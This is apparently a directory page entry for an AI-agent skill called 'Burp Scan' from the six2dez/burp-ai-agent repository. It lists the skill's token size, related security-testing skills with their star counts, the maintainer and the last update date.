About 6.4k tokens (SKILL.md is roughly 25k characters). Agents keep only the skill's name and description in context until a task matches; then they load SKILL.md in full.
Skills that share tags, products or a category with Burp Scan: Burp MCP Vuln Check (langbyyi/CyberStrikeAI-SRC, 135 stars), Hunt Burp (Encod3d-Sec/TORCH, 329 stars), MCP Server Tools (samugit83/redamon, 3k stars) and Agentic Tool Integration (samugit83/redamon, 3k stars). The comparison table on this page puts their stars, adoption, token cost, safety result and licence side by side.
six2dez (a GitHub user) maintains it in six2dez/burp-ai-agent, which has 1,526 GitHub stars. The repository was last updated on October 8, 2026.
Source: six2dez/burp-ai-agent on GitHub. Facts on this page come from the repository at the commit we read; the author's words are quoted as theirs.